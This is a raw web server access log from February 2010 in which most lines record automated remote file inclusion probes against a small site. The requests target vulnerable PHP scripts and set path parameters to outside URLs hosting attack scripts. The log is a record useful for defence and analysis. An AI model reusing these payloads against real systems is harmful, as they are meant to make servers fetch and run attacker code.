222.237.78.176 - - [06/Feb/2010:19:44:50 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:44:52 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:45:11 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:45:11 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:45:12 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:45:12 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:45:12 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:45:13 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:19:46:14 -0800] "GET //bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:19:46:14 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:19:46:14 -0800] "GET /logs/access.log%20%20///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:46:34 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:46:34 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:46:34 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:48:40 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:48:44 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.128.144.98 - - [06/Feb/2010:19:48:44 -0800] "GET /logs/access_091002.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:48:44 -0800] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:52:38 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:52:38 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:52:38 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:52:52 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:52:52 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:52:52 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:53:17 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:53:17 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:53:17 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:53:46 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:53:46 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:53:46 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:59:06 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:59:06 -0800] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:59:06 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:07:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:07:55 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:07:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:07:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:08:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:08:03 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:20:08:04 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:20:13:30 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:20:13:30 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:20:13:30 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:20:13:32 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:20:13:32 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:20:13:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.115.213.229 - - [06/Feb/2010:20:21:04 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://hobikriya.com/administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.allattitudedoxies.com"
211.115.213.229 - - [06/Feb/2010:20:21:04 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://hobikriya.com/administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.allattitudedoxies.com"
211.115.213.229 - - [06/Feb/2010:20:21:04 -0800] "GET /logs/access_091002.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://hobikriya.com/administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.allattitudedoxies.com"
87.253.63.102 - - [06/Feb/2010:20:29:23 -0800] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.carex.co.kr/bnp/data/.cc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.253.63.102 - - [06/Feb/2010:20:29:23 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.carex.co.kr/bnp/data/.cc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.253.63.102 - - [06/Feb/2010:20:29:23 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.carex.co.kr/bnp/data/.cc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:20:32:01 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:20:39:56 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:20:40:50 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
87.253.63.102 - - [06/Feb/2010:20:43:18 -0800] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.carex.co.kr/bnp/data/.cc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:20:54:38 -0800] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:20:54:38 -0800] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:21:01:41 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:21:01:49 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:21:01:49 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:21:01:49 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
67.195.112.92 - - [06/Feb/2010:21:09:04 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
67.195.112.92 - - [06/Feb/2010:21:09:05 -0800] "GET / HTTP/1.0" 200 908 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
74.86.155.18 - - [06/Feb/2010:21:09:39 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.86.155.18 - - [06/Feb/2010:21:09:39 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.86.155.18 - - [06/Feb/2010:21:09:39 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:21:17:14 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
109.123.78.44 - - [06/Feb/2010:21:17:14 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "allattitudedoxies.com"
38.99.97.198 - - [06/Feb/2010:21:35:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.allattitudedoxies.com"
38.99.97.198 - - [06/Feb/2010:21:35:11 -0800] "GET /?D=A HTTP/1.1" 200 924 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.allattitudedoxies.com"
38.99.97.198 - - [06/Feb/2010:21:35:27 -0800] "GET /?M=A HTTP/1.1" 200 924 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:21:44:11 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:21:44:11 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:21:44:11 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:21:44:24 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:21:44:24 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:21:44:24 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:48:30 -0800] "GET //bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:48:30 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:48:30 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:49:45 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:49:45 -0800] "GET //bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:49:45 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:49:47 -0800] "GET //bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:49:47 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:49:47 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:50:01 -0800] "GET //bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:50:01 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
200.93.147.154 - - [06/Feb/2010:21:50:04 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:03:43 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:03:43 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:03:43 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:22:04:40 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:22:04:40 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:22:04:40 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:06:48 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:06:48 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:06:48 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:13:53 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:13:53 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:13:53 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:14:35 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:14:35 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.248.104.130 - - [06/Feb/2010:22:14:35 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
173.165.1.69 - - [06/Feb/2010:22:17:00 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.96.156.164 - - [06/Feb/2010:22:26:46 -0800] "GET /delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.96.156.164 - - [06/Feb/2010:22:26:47 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.96.156.164 - - [06/Feb/2010:22:26:47 -0800] "GET /logs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.96.156.164 - - [06/Feb/2010:22:27:05 -0800] "GET /logs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.96.156.164 - - [06/Feb/2010:22:27:05 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.96.156.164 - - [06/Feb/2010:22:27:05 -0800] "GET /delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:22:38:26 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:22:38:26 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.39.145.146 - - [06/Feb/2010:22:38:26 -0800] "GET /logs/access.log%20%20//akocomments.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:22:42:18 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:22:42:18 -0800] "GET /logs/access.log%20%20//akocomments.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
